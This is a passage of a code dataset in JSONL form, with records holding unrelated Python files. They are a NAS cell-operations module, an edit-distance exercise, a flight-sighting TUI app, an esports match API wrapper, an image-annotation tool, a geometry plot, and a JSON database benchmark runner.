stride={stride}\".format(**self.__dict__)\n","sub_path":"NAS/lib/models/cell_operations_sabn.py","file_name":"cell_operations_sabn.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425853874","text":"'''\r\nProject: Edit Distance (Dynamic Programming)\r\nName: Jonathan Argumedo\r\nClass: Data Structures 2302\r\nInstructor: Diego Aguirre\r\nTA: Anindita Nath\r\nDate: December 9, 2018\r\nUpdate by: (Your name goes here)\r\n'''\r\n\r\n#imports\r\nimport time\r\n\r\n\r\n'''\r\n'editDistance' method simply finds the differences in two \r\nwords that are passed as parameters. A better explination can be\r\nfound online. 
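# Assumed usage of the OPS registry above: each entry is a factory with the
# positional signature (C_in, C_out, stride, affine, track_running_stats,
# num_ops, num_prev_nodes, is_node_zero) returning an nn.Module; the concrete
# values below are illustrative only.
op = OPS["nor_conv_3x3"](16, 16, 1, True, True, 5, 1, False)
# The modules defined here also take routing arguments in forward:
# y = op(x, prev_op_idx=[2], first_layer=False)   # x: (N, 16, H, W) tensor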
\r\n'''\r\ndef editDistance(string, string2, lengthStr, lengthStr2):\r\n \r\n # If first string is empty \r\n # insert all characters of second string into first \r\n if lengthStr == 0:\r\n return lengthStr2\r\n \r\n # If second string is empty \r\n # insert all characters of first string into first \r\n if lengthStr2 == 0:\r\n return lengthStr\r\n \r\n # If last characters of two strings are same\r\n # Ignore last characters and get count for \r\n # remaining strings. \r\n if string[lengthStr - 1] == string2[lengthStr2 -1]:\r\n return editDistance(string, string2, lengthStr -1, lengthStr2 -1)\r\n\r\n #do all possible cases\r\n return 1 + min(\r\n #Insert\r\n editDistance(string, string2, lengthStr , lengthStr2 - 1),\r\n #delete\r\n editDistance(string, string2, lengthStr - 1, lengthStr2),\r\n #replace\r\n editDistance(string, string2, lengthStr - 1, lengthStr2 - 1) )\r\n\r\n'''\r\n'compute' method takes two strings as parameters and it computes the \r\nleast difference between each word (Edit Distance)\r\n'''\r\ndef compute(string, string2):\r\n print ('-' *20 + \"EDIT DISTANCE\" + '-' *20)\r\n print(\"Words:\\t1) %s\\n\\t2) %s\" %(string, string2))\r\n print(\"\\n\\nThe Edit Distance is: %d\" % editDistance(string, string2, len(string), len(string2)))\r\n print ('-' * 53)\r\n\r\n\r\ndef main():\r\n #You could simply compy past the code from 'compute' method\r\n #and paste it in this method. Now your code\r\n #will be able to ask the user for 2 words\r\n '''\r\n print('-' *20 + \"INPUT WORDS\" + '-' *20)\r\n string = input(\"Enter the first word: \")\r\n string2 = input(\"Enter the second word: \")\r\n print('-' *51 + \"\\n\\n\")\r\n '''\r\n \r\n #LAB 7 (class scenerio)\r\n #I could of used one file to do comperasions\r\n #Just felt this would be better for testing\r\n try:\r\n name_file = input(\"Enter the name of the first file (include file extension): \")\r\n name_file2 = input(\"Enter the name of the second file (include file extension): \")\r\n file = open(name_file, \"r\")\r\n \r\n #compare each word in the first file with all the \r\n #other words in the second file\r\n \r\n #check how long it takes to execute\r\n #for testing purposes only\r\n #(small files, small1 file) (big file, big1 file) etc\r\n start_time = time.time()\r\n \r\n for word in file:\r\n file2 = open(name_file2, \"r\")\r\n for compared in file2:\r\n compute(word, compared)\r\n \r\n print(\"\\n\\nIt took [%.5f] to find the distance for every possible word\" %(time.time() - start_time))\r\n except FileNotFoundError:\r\n print(\"\\n\\nOops! 
File not found\\nCheck the name and try again\")\r\nmain()","sub_path":"editDistance.py","file_name":"editDistance.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552390716","text":"from flightrecorder.db.dbdatabase import FlightRecorderDatabase\nfrom flightrecorder.dataexchange.dxcsv import import_csv, export_csv\nfrom flightrecorder.config.configuration import Configuration\nfrom flightrecorder.forms.frconstants import *\nfrom flightrecorder.forms.frmain import MainForm\nfrom flightrecorder.forms.frflightdetails import FlightDetailsForm\nfrom flightrecorder.forms.fraircraftregistration import AircraftRegistrationForm\nfrom flightrecorder.forms.fraircraftdetails import AircraftDetailsForm\nfrom flightrecorder.forms.frsightings import SightingForm\nfrom flightrecorder.forms.frconfirm import ConfirmForm\nfrom flightrecorder.forms.frdataexchange import ImportForm, ExportForm\nfrom flightrecorder.forms.frquery import QueryByFlight, QueryByAircraft, QueryByAirline, QueryByRoute, QueryShowSighting\nfrom flightrecorder.forms.frsetdblocation import SelectDatabaseLocationForm\nimport npyscreen as np\nimport datetime as datetime\nimport os\n\n\nclass FlightRecorderApp(np.NPSAppManaged):\n def onStart(self):\n self._config = Configuration()\n\n try:\n os.remove(self._config.log_file_name())\n except:\n pass\n\n # Configure properties\n self._control_callback_handler = None\n self._db = None\n self._properties = {KEY_FLIGHT_NUMBER: None,\n KEY_EMBARKATION: None,\n KEY_DESTINATION: None,\n KEY_AIRLINE: None,\n KEY_REGISTRATION: None,\n KEY_SERIAL_NUMBER: None,\n KEY_MANUFACTURER: None,\n KEY_MODEL: None,\n KEY_MANUFACTURED: None,\n KEY_AGE: None,\n KEY_ALTITUDE: None,\n KEY_LOCATION: None,\n KEY_DATE: None}\n\n # Attempt to open the database\n self.open_database()\n\n # Configure forms\n title = \"Flight Recorder V{}\".format(self._config.app_version())\n self.addForm(FRM_MAIN, MainForm, name=title)\n self.addForm(FRM_SET_DATABASE_LOCATION, SelectDatabaseLocationForm, name=title)\n self.addForm(FRM_FLIGHT_DETAILS, FlightDetailsForm, name=\"Flight Details\")\n self.addForm(FRM_AIRCRAFT_REGISTRATION, AircraftRegistrationForm, name=\"Aircraft Registration Number\")\n self.addForm(FRM_AIRCRAFT_DETAILS, AircraftDetailsForm, name=\"Aircraft Details\")\n self.addForm(FRM_SIGHTING_DETAILS, SightingForm, name=\"Aircraft Sighting Details\")\n self.addForm(FRM_CONFIRM_FORM, ConfirmForm, name=\"Confirm Details\")\n self.addForm(FRM_IMPORT, ImportForm, name=\"Import Data\")\n self.addForm(FRM_EXPORT, ExportForm, name=\"Export Data\")\n self.addForm(FRM_QUERY_BY_FLIGHT, QueryByFlight, name=\"Query Sightings by Flight Number\")\n self.addForm(FRM_QUERY_BY_AIRCRAFT, QueryByAircraft, name=\"Query Sightings by Aircraft\")\n self.addForm(FRM_QUERY_BY_AIRLINE, QueryByAirline, name=\"Query Sightings by Airline\")\n self.addForm(FRM_QUERY_BY_ROUTE, QueryByRoute, name=\"Query Sightings by Route\")\n self.addForm(FRM_QUERY_SHOW_SIGHTING, QueryShowSighting, name=\"Selected Sighting\")\n\n def log_debug(self, message):\n date = datetime.datetime.now().strftime(\"%d/%m/%Y, %H:%M:%S\")\n f = open(self._config.log_file_name(), mode=\"at\", encoding=\"UTF-8\")\n f.write(\"{} : {}\\n\".format(date, message))\n f.close()\n\n def log_properties(self):\n for property_name, value in self._properties.items():\n if value is None:\n log_value = \"None\"\n else:\n log_value = value\n self.log_debug(\"{} = {}\".format(property_name, 
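# The plain recursion in editDistance above is exponential in the word lengths
# (each mismatch fans out into three subcalls); a memoized sketch with the same
# result stays O(len(string) * len(string2)):
from functools import lru_cache

def edit_distance(string, string2):
    @lru_cache(maxsize=None)
    def go(i, j):
        if i == 0:
            return j
        if j == 0:
            return i
        if string[i - 1] == string2[j - 1]:
            return go(i - 1, j - 1)
        return 1 + min(go(i, j - 1),      # insert
                       go(i - 1, j),      # delete
                       go(i - 1, j - 1))  # replace
    return go(len(string), len(string2))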
log_value))\n\n def open_database(self):\n if self._config.database_name() is not None:\n self._db = FlightRecorderDatabase()\n else:\n self._db = None\n\n def set_database_location(self, location):\n self._config.set_database_location(location)\n self.open_database()\n\n def set_property(self, property_name, value):\n new_value = {property_name: value}\n self._properties.update(new_value)\n\n def get_property(self, property_name):\n return self._properties[property_name]\n\n def set_control_callback_handler(self, handler):\n self._control_callback_handler = handler\n\n def handle_control_callback(self, control, value):\n if self._control_callback_handler is not None:\n self._control_callback_handler(control, value)\n\n def database(self):\n return self._db\n\n def flight_exists(self, number):\n return self._db.flight_repo().exists(number)\n\n def load_existing_airlines(self):\n airlines = self._db.airline_repo().read_all()\n return [airline.name() for airline in airlines]\n\n def aircraft_exists(self, registration):\n return self._db.aircraft_repo().exists(registration)\n\n def load_existing_aircraft(self):\n aircraft = self._db.aircraft_repo().read(\"registration\", self.get_property(KEY_REGISTRATION))\n self.set_property(KEY_SERIAL_NUMBER, aircraft.serial_number())\n self.set_property(KEY_MANUFACTURER, aircraft.model().manufacturer().name())\n self.set_property(KEY_MODEL, aircraft.model().name())\n self.set_property(KEY_MANUFACTURED, aircraft.manufactured())\n self.set_property(KEY_AGE, aircraft.age())\n\n def load_existing_manufacturers(self):\n manufacturers = self._db.manufacturer_repo().read_all()\n return [manufacturer.name() for manufacturer in manufacturers]\n\n def load_models_for_manufacturer(self, manufacturer):\n models = self._db.model_repo().read_all_for_manufacturer(manufacturer)\n return [model.name() for model in models]\n\n def load_existing_locations(self):\n locations = self._db.location_repo().read_all()\n return [location.name() for location in locations]\n\n def load_matching_flights(self, flight_number):\n flights = self._db.flight_repo().read_all(\"number\", flight_number, \"id\")\n return [(flight.embarkation(), flight.destination(), flight.airline().name()) for flight in flights]\n\n def load_sighting(self, sighting):\n self.set_property(KEY_FLIGHT_NUMBER, sighting.flight().number())\n self.set_property(KEY_EMBARKATION, sighting.flight().embarkation())\n self.set_property(KEY_DESTINATION, sighting.flight().destination())\n self.set_property(KEY_AIRLINE, sighting.flight().airline().name())\n self.set_property(KEY_REGISTRATION, sighting.aircraft().registration())\n self.set_property(KEY_SERIAL_NUMBER, sighting.aircraft().serial_number())\n self.set_property(KEY_MANUFACTURER, sighting.aircraft().model().manufacturer().name())\n self.set_property(KEY_MODEL, sighting.aircraft().model().name())\n self.set_property(KEY_MANUFACTURED, sighting.aircraft().manufactured())\n self.set_property(KEY_AGE, sighting.aircraft().age())\n self.set_property(KEY_ALTITUDE, sighting.altitude())\n self.set_property(KEY_LOCATION, sighting.location().name())\n self.set_property(KEY_DATE, sighting.date())\n\n def create_record(self):\n aircraft_id = self._db.create_aircraft(self.get_property(KEY_REGISTRATION),\n self.get_property(KEY_SERIAL_NUMBER),\n self.get_property(KEY_MANUFACTURED),\n self.get_property(KEY_MODEL),\n self.get_property(KEY_MANUFACTURER)).db_id()\n\n flight_id = self._db.create_flight(self.get_property(KEY_FLIGHT_NUMBER),\n self.get_property(KEY_EMBARKATION),\n 
self.get_property(KEY_DESTINATION),\n self.get_property(KEY_AIRLINE)).db_id()\n\n location_id = self._db.create_location(self.get_property(KEY_LOCATION)).db_id()\n\n self._db.create_sighting(self.get_property(KEY_ALTITUDE),\n self.get_property(KEY_DATE),\n location_id,\n flight_id,\n aircraft_id)\n\n def import_data(self, filename, progress_callback):\n import_csv(filename, progress_callback, self._db)\n\n def export_data(self, filename, progress_callback):\n export_csv(filename, progress_callback, self._db)\n","sub_path":"src/flightrecorder/forms/frapplication.py","file_name":"frapplication.py","file_ext":"py","file_size_in_byte":8584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"474046699","text":"import requests\nimport json\nfrom datetime import datetime\nimport main_page.data_modules.functions\nimport main_page.data_modules.user\nimport main_page.data_modules.team\n\n\nclass Match:\n def __init__(self, match_id):\n self.base_url = 'http://api.eslgaming.com/play/v1/'\n self.match_id = str(match_id)\n\n def get_match_info(self):\n \"\"\"Returns all match info.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n match_name = 'Match link'\n match_link = ' {1} '.format(self.match_id, match_name)\n response['Link'] = match_link\n\n del response['contestants']\n del response['maps']\n del response['gameaccounts']\n del response['parameters']\n\n return response\n\n def get_match_mode(self):\n \"\"\"Returns match mode ('1on1', '5on5', etc.).\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n return response['type']\n\n def get_contestants_profile(self):\n \"\"\"Returns 2 teams profiles.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n test_match = Match(self.match_id)\n contestants_profiles = []\n if test_match.get_match_info() == \"error\":\n return \"error\"\n else:\n for key, value in test_match.get_match_info().items():\n if key == \"contestants\":\n contestants = value\n for i in range(len(contestants)):\n if Match.get_match_mode(self) == \"1on1\":\n if contestants[i]['user']['id'] == None:\n contestants_profiles.append({'User': 'Deleted player account'})\n else:\n contestant = main_page.data_modules.user.User(contestants[i]['user']['id'])\n contestants_profiles.append(contestant.get_profile())\n else:\n if contestants[i]['team']['id'] == None:\n contestants_profiles.append({'Team': 'Deleted team account'})\n else:\n contestant = main_page.data_modules.team.Team(contestants[i]['team']['id'])\n contestants_profiles.append(contestant.get_team_info())\n return contestants_profiles\n\n def get_contestants_members_info(self):\n \"\"\"Returns useful info of players, participating in that match.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n test_match = Match(self.match_id)\n members_info = []\n players_id = []\n i = 0\n for key, value in test_match.get_match_info().items():\n if key == \"gameaccounts\":\n players = value\n for key_player, value_player in players.items():\n new_member = main_page.data_modules.user.User(key_player)\n 
members_info.append(new_member.get_useful_info())\n return members_info\n\n def get_match_date_time(self):\n \"\"\"Returns Match Date and its Duration.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n status = response['status']\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n if status == \"closed\":\n start_date_string = response['beginAt']\n end_date_string = response['calculatedAt']\n\n start_date = start_date_string[:10]\n start_time = start_date_string[11:19]\n start = start_date + ' ' + start_time\n beginning_date = datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\") # !!!\n\n end_date = end_date_string[:10]\n end_time = end_date_string[11:19]\n end = end_date + ' ' + end_time\n final_date = datetime.strptime(end, \"%Y-%m-%d %H:%M:%S\") # !!!\n\n delta = final_date - beginning_date\n match_name = 'Match link'\n match_link = ' {1} '.format(self.match_id,\n match_name)\n match_time = {\"Start time\": start, \"End time\": end, \"Duration of the match\": delta, 'Link': match_link}\n return match_time\n else:\n return \"open\"\n\n def get_match_results(self):\n \"\"\"Returns match status and result, if it is closed.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n test_match = Match(self.match_id)\n result_argument = response['result']['score']\n results = result_argument\n\n teams = list(results.keys())\n scores = list(results.values())\n winners = teams[0]\n losers = teams[1]\n\n match_name = 'Match link'\n match_link = ' {1} '.format(self.match_id, match_name)\n\n result = \"\"\n for i in range(2):\n if scores[0] > scores[1]:\n winners = teams[0]\n losers = teams[1]\n elif scores[1] > scores[0]:\n winners = teams[1]\n losers = teams[0]\n else:\n result = \"draw\"\n\n if Match.get_match_mode(self) == \"1on1\":\n user_win = main_page.data_modules.user.User(winners)\n user_lose = main_page.data_modules.user.User(losers)\n user_win_id = \"\"\n user_win_name = \"\"\n user_lose_id = \"\"\n user_lose_name = \"\"\n if \"error\" in user_win.get_profile() and \"error\" in user_lose.get_profile():\n user_win_name = \"'\" + \"Deleted account\" + \"'\"\n user_win_id = \"id: \" + winners\n user_win_link = \"ERROR - DELETED ACCOUNT\"\n user_lose_name = \"'\" + \"Deleted account\" + \"'\"\n user_lose_id = \"id: \" + losers\n user_lose_link = \"ERROR - DELETED ACCOUNT\"\n if \"error\" in user_win.get_profile() and not (\"error\" in user_lose.get_profile()):\n user_win_id = \"id: \" + winners\n user_win_name = \"'\" + \"Deleted account\" + \"'\"\n user_win_link = \"ERROR - DELETED ACCOUNT\"\n user_lose_id = \"id: \" + losers\n user_lose_name = user_lose.get_profile()['nickname']\n user_lose_link = ' {1} '.format(losers,\n user_lose_name)\n if \"error\" in user_lose.get_profile() and not (\"error\" in user_win.get_profile()):\n user_lose_id = \"id: \" + losers\n user_lose_name = \"'\" + \"Deleted account\" + \"'\"\n user_lose_link = \"ERROR - DELETED ACCOUNT\"\n user_win_id = \"id: \" + winners\n user_win_name = user_win.get_profile()['nickname']\n user_win_link = ' {1} '.format(winners,\n user_win_name)\n elif not (\"error\" in user_lose.get_profile()) and not (\"error\" in user_win.get_profile()):\n user_win_id = \"id: \" + winners\n user_win_name = user_win.get_profile()['nickname']\n user_win_link = ' {1} '.format(winners,\n user_win_name)\n 
user_lose_id = \"id: \" + losers\n user_lose_name = user_lose.get_profile()['nickname']\n user_lose_link = ' {1} '.format(losers,\n user_lose_name)\n if result != \"draw\":\n dict = {user_win_link: 'has won!', user_lose_link: 'has lost.', 'Link': match_link}\n return dict\n else:\n dict = {'Result': 'There result is draw', user_win_link: user_win_id, user_lose_link: user_lose_id,\n 'Link': match_link}\n return dict\n else:\n team_win = main_page.data_modules.team.Team(winners)\n team_lose = main_page.data_modules.team.Team(losers)\n team_win_id = \"\"\n team_win_name = \"\"\n team_lose_id = \"\"\n team_lose_name = \"\"\n if \"error\" in team_lose.get_team_info() and \"error\" in team_win.get_team_info():\n team_win_id = \"0 - Deleted Account\"\n team_win_name = \"Deleted Account - 1\"\n team_win_link = \"ERROR - DELETED ACCOUNT\"\n team_lose_id = \"0 - Deleted Account\"\n team_lose_name = \"Deleted Account - 2\"\n team_lose_link = \"ERROR - DELETED ACCOUNT\"\n if \"error\" in team_win.get_team_info() and not (\"error\" in team_lose.get_team_info()):\n team_win_id = \"id: \" + winners\n team_win_name = \"'\" + \"Deleted account\" + \"'\"\n team_win_link = \"ERROR - DELETED ACCOUNT\"\n team_lose_id = \"id: \" + losers\n team_lose_name = team_lose.get_team_info()['name']\n team_lose_link = ' {1} '.format(losers,\n team_lose_name)\n if \"error\" in team_lose.get_team_info() and not (\"error\" in team_win.get_team_info()):\n team_lose_id = \"id: \" + losers\n team_lose_name = \"'\" + \"Deleted account\" + \"'\"\n team_lose_link = \"ERROR - DELETED ACCOUNT\"\n team_win_id = \"id: \" + winners\n team_win_name = team_win.get_team_info()['name']\n team_win_link = ' {1} '.format(winners,\n team_win_name)\n elif not (\"error\" in team_win.get_team_info()) and not (\"error\" in team_lose.get_team_info()):\n team_win_id = \"id: \" + winners\n team_win_name = team_win.get_team_info()['name']\n team_win_link = ' {1} '.format(winners,\n team_win_name)\n team_lose_id = \"id: \" + losers\n team_lose_name = team_lose.get_team_info()['name']\n team_lose_link = ' {1} '.format(losers,\n team_lose_name)\n if result != \"draw\":\n dict = {team_win_link: 'has won!', team_lose_link: 'has lost.', 'Link': match_link}\n return dict\n else:\n dict = {'Result': 'There result is draw', team_win_link: team_win_id, team_lose_link: team_lose_id,\n 'Link': match_link}\n return dict\n\n def get_match_media(self):\n \"\"\"Returns match media, if any.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id + \"/media\")\n response = json.loads(r.text)\n new_r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n new_response = json.loads(new_r.text)\n status = new_response['status']\n files = []\n if status == \"closed\":\n for i in range(len(response)):\n files.append(response[i]['filename'])\n if len(files) == 0:\n return \"nothing\"\n else:\n return files\n elif status == \"open\":\n return \"Open\" # Match is not closed yet\n\n def get_match_status(self):\n \"\"\"Returns current match status.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n status = response['status']\n return status\n","sub_path":"Code/main_page/data_modules/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":13818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163406715","text":"import cv2\nimport 
glob\nimport math\nimport numpy as np\n \ndef sort_func(image_name):\n video_name = int.from_bytes(image_name.split('/')[-2].encode(), 'little')\n num = int(image_name.split('/')[-1].split('.')[-2])\n return video_name + num\nimage_name_list1 = glob.glob('../data/train/1/*/*.jpg')\nimage_name_list1.sort(key = sort_func)\nimage_name_list2 = glob.glob('../data/train/2/*/*.jpg')\nimage_name_list2.sort(key = sort_func)\nimage_name_list0 = glob.glob('../data/train/0/*/*.jpg')\nimage_name_list0.sort(key = sort_func)\nimage_name_list = image_name_list1 + image_name_list2 + image_name_list0\n\ncv2.namedWindow('image',cv2.WINDOW_NORMAL)\ncv2.setWindowProperty(\"image\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\nimage = cv2.imread(image_name_list[0])\nimage_size = image.shape\nr = 125\n\nmouse_x = 0\nmouse_y = 0\npoint_a = (0, 0)\npoint_b = (0, 0)\n\ndef mouse_callback(event, x, y, flag, param):\n global mouse_x, mouse_y, point_a, point_b\n mouse_x = x\n mouse_y = y\n point_a = (max(x - r, 0), max(y - r, 0))\n point_b = (min(x + r, image_size[1]), min(y + r, image_size[0]))\n\ncv2.setMouseCallback('image', mouse_callback)\ni = 0 \n\n#data = np.zeros((len(image_name_list), 4), dtype ='int')\n#np.save(\"../data/mark.npy\", data)\ndata = np.load(\"../data/mark.npy\")\n\nwhile(1):\n i = i % len(image_name_list)\n image_name = image_name_list[i]\n image = cv2.imread(image_name)\n if data[i].sum() != 0:\n p_a = (data[i][0], data[i][1])\n p_b = (data[i][2], data[i][3])\n image = cv2.rectangle(image, p_a, p_b, [237, 128, 255] , 5)\n image = cv2.rectangle(image, point_a, point_b, [128, 128, 0] , 5)\n cv2.imshow('image',image)\n key = cv2.waitKey(2)\n if key == ord('q'):\n break\n if key == ord('s'):\n np.save(\"../data/mark.npy\", data)\n np.save('../data/image_name_list.npy',np.array(image_name_list))\n continue\n if key == ord('2'):\n data[i][0] = point_a[0]\n data[i][1] = point_a[1]\n data[i][2] = point_b[0]\n data[i][3] = point_b[1]\n i += 1\n continue\n if key == ord('1'):\n i = i - 1\n continue\n if key == ord('3'):\n i = i + 1\n continue\n if key == ord('7'):\n i = i - 100\n continue\n if key == ord('9'):\n i = i + 100\n if key == ord('3'):\n i = i + 10\n continue\n if key == ord('4'):\n i = i - 10\n if key == ord('6'):\n i = i + 10\n continue\n\n","sub_path":"mark.py","file_name":"mark.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60590428","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\ndef dajSuradniceStreduAPolomer(x1,y1,x2,y2,alpha):#vychadza z 2 bodov a smernice v 1 z nich \n #priamka a - normala na spojnicu bodov [x1,y1] a [x2,y2]\n ka = np.tan(np.pi/2.0+np.arctan(float(y1-y2)/float(x1-x2)))#smernica priamky a\n qa = 0.5*(y1+y2-np.tan(np.pi/2.0+np.arctan(float(y1-y2)/float(x1-x2)))*float(x1+x2))\n #priamka c - normala na smer natocenia robota\n kc = np.tan(np.pi/2.0+alpha)#smernica priamky c\n qc = y1+np.tan(np.pi/2.0+alpha)*x1\n #suradnice stredu kruznice prienik priamky a a c\n sx = float(qa-qc)/float(kc-ka)#x-ova suradnica stredu kruznice\n sy = float(kc*sx+qc)#y-ova suradnica stredu kruznice\n R = np.sqrt((x1-sx)**2+(y1-sy)**2)#polomer danej kruznice\n omega = 2*np.arcsin(np.sqrt((x1-x2)**2+(y1-y2)**2)/(2.*R))#uhol v radianoch o aky sa zatoci okolo bodu Sx Sy\n omegaDeg = omega*180./np.pi#uhol v stupnoch\n return sx,sy,R,omegaDeg,omega\nA = (0,0)\nB = (80,120)\nS = dajSuradniceStreduAPolomer(A[0],A[1],B[0],B[1],0)\nfig, ax = 
plt.subplots()\nos=180\nplt.subplots_adjust( bottom=0.10)\n#Saxis('scaled')\npylab.xlim(-os*5/4.,os*5/4.)\npylab.ylim(-os,os)\nplt.plot(S[0],S[1],'go')\nplt.plot(A[0],A[1],'ro')\nplt.plot(B[0],B[1],'bo')\nplt.show()\nplt.grid()","sub_path":"ine/NeaktualneZdrojaky/bodSmer.py","file_name":"bodSmer.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144026882","text":"import os\nimport logging\n\nimport ArgoQueries\nimport MongoQueries\nimport PJsonQueries\nfrom bench_utils import TestSuite\nfrom Settings import (\n RESULTS_FILENAME,\n DATA_SIZE,\n NUM_BENCH_ITERATIONS,\n)\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__name__)\n\n###\n# Wipe out JSON Documents generated by nobench_data_gen\n###\ndef remove_argo_json_docs():\n import Settings\n files = [Settings.ARGO_EXTRA_FILENAME, Settings.ARGO_FILENAME]\n for filename in files:\n if os.path.exists(filename):\n os.remove(filename)\n\ndef remove_mongo_json_docs():\n import Settings\n files = [Settings.MONGO_FILENAME, Settings.MONGO_EXTRA_FILENAME]\n for filename in files:\n if os.path.exists(filename):\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n q1a = ArgoQueries.Query1Argo()\n q2a = ArgoQueries.Query2Argo()\n q3a = ArgoQueries.Query3Argo()\n q4a = ArgoQueries.Query4Argo()\n q5a = ArgoQueries.Query5Argo()\n q6a = ArgoQueries.Query6Argo()\n q7a = ArgoQueries.Query7Argo()\n q8a = ArgoQueries.Query8Argo()\n q9a = ArgoQueries.Query9Argo()\n q10a = ArgoQueries.Query10Argo()\n q11a = ArgoQueries.Query11Argo()\n q12a = ArgoQueries.Query12Argo()\n q13a = ArgoQueries.Query13Argo()\n q14a = ArgoQueries.Query14Argo()\n argo_loader = ArgoQueries.InitialLoadArgo()\n argo_dropper = ArgoQueries.DropCollectionArgo()\n argo_queries = [q1a, q2a, q3a, q4a, q5a, q6a, q7a, q8a, q9a, q10a, q11a, q12a, q13a, q14a]\n argo_include_indexes = range(0, 14)\n argo_skip_indexes = [10]\n argo_test_suite = TestSuite(\n tag='Argo',\n loader=argo_loader,\n cleaner=argo_dropper,\n queries_array=argo_queries,\n include_indexes=argo_include_indexes,\n skip_indexes=argo_skip_indexes,\n )\n\n q1m = MongoQueries.Query1Mongo()\n q2m = MongoQueries.Query2Mongo()\n q3m = MongoQueries.Query3Mongo()\n q4m = MongoQueries.Query4Mongo()\n q5m = MongoQueries.Query5Mongo()\n q6m = MongoQueries.Query6Mongo()\n q7m = MongoQueries.Query7Mongo()\n q8m = MongoQueries.Query8Mongo()\n q9m = MongoQueries.Query9Mongo()\n q10m = MongoQueries.Query10Mongo()\n q11m = MongoQueries.Query11Mongo()\n q12m = MongoQueries.Query12Mongo()\n q13m = MongoQueries.Query13Mongo()\n q14m = MongoQueries.Query14Mongo()\n q15m = MongoQueries.Query15Mongo()\n mongo_loader = MongoQueries.InitialLoadMongo()\n mongo_dropper = MongoQueries.DropCollectionMongo()\n mongo_queries = [q1m, q2m, q3m, q4m, q5m, q6m, q7m, q8m, q9m, q10m, q11m, q12m, q13m, q14m, q15m]\n mongo_include_indexes = range(0, 15)\n mongo_skip_indexes = []\n mongo_test_suite = TestSuite(\n tag='Mongo',\n loader=mongo_loader,\n cleaner=mongo_dropper,\n queries_array=mongo_queries,\n include_indexes=mongo_include_indexes,\n skip_indexes=mongo_skip_indexes,\n )\n\n q1p = PJsonQueries.Query1PJson()\n q2p = PJsonQueries.Query2PJson()\n q3p = PJsonQueries.Query3PJson()\n q4p = PJsonQueries.Query4PJson()\n q5p = PJsonQueries.Query5PJson()\n q6p = PJsonQueries.Query6PJson()\n q7p = PJsonQueries.Query7PJson()\n q8p = PJsonQueries.Query8PJson()\n q9p = PJsonQueries.Query9PJson()\n q10p = PJsonQueries.Query10PJson()\n q11p = 
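# Sanity check for dajSuradniceStreduAPolomer above (assumed standalone usage,
# with the function in scope): the returned centre (sx, sy) must be equidistant
# from both input points. Caveat: the intercept `qc = y1 + tan(pi/2 + alpha) * x1`
# adds where the point-slope form needs y1 - k*x1, so the check holds only for
# x1 == 0, as in the file's own A = (0, 0) example.
import numpy as np
sx, sy, R, omegaDeg, omega = dajSuradniceStreduAPolomer(0, 0, 80, 120, 0.3)
assert abs(np.hypot(0 - sx, 0 - sy) - R) < 1e-6
assert abs(np.hypot(80 - sx, 120 - sy) - R) < 1e-6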
PJsonQueries.Query11PJson()\n q12p = PJsonQueries.Query12PJson()\n q13p = PJsonQueries.Query13PJson()\n q14p = PJsonQueries.Query14PJson()\n q15p = PJsonQueries.Query15PJson()\n pjson_loader = PJsonQueries.InitialLoadPJson()\n pjson_dropper = PJsonQueries.DropCollectionPJson()\n pjson_queries = [q1p, q2p, q3p, q4p, q5p, q6p, q7p, q8p, q9p, q10p, q11p, q12p, q13p, q14p, q15p]\n pjson_include_indexes = range(0, 15)\n pjson_skip_indexes = []\n pjson_test_suite = TestSuite(\n tag='PJson',\n loader=pjson_loader,\n cleaner=pjson_dropper,\n queries_array=pjson_queries,\n include_indexes=pjson_include_indexes,\n skip_indexes=pjson_skip_indexes,\n )\n\n run_argo_bench = True\n run_mongo_bench = True\n run_pjson_bench = True\n\n #################################\n #Actual testing area begins here.\n #################################\n if run_argo_bench:\n generate_argo_data = True\n load_argo_data = True\n log.info(\"Beginning Argo Benchmark.\")\n if generate_argo_data:\n log.info(\"Argo Generate new Data flag was true. Attempting to remove JSON docs.\")\n remove_argo_json_docs()\n log.info(\"Generating new data of size: {}.\".format(DATA_SIZE))\n ArgoQueries.generate_data_argo(DATA_SIZE)\n if load_argo_data:\n log.info(\"Cleaning out Argo PostgreSQL.\")\n argo_test_suite.clean()\n log.info(\"Loading new data into Argo PostgreSQL.\")\n argo_test_suite.load_data()\n log.info(\"Running Argo Benchmark Queries.\")\n 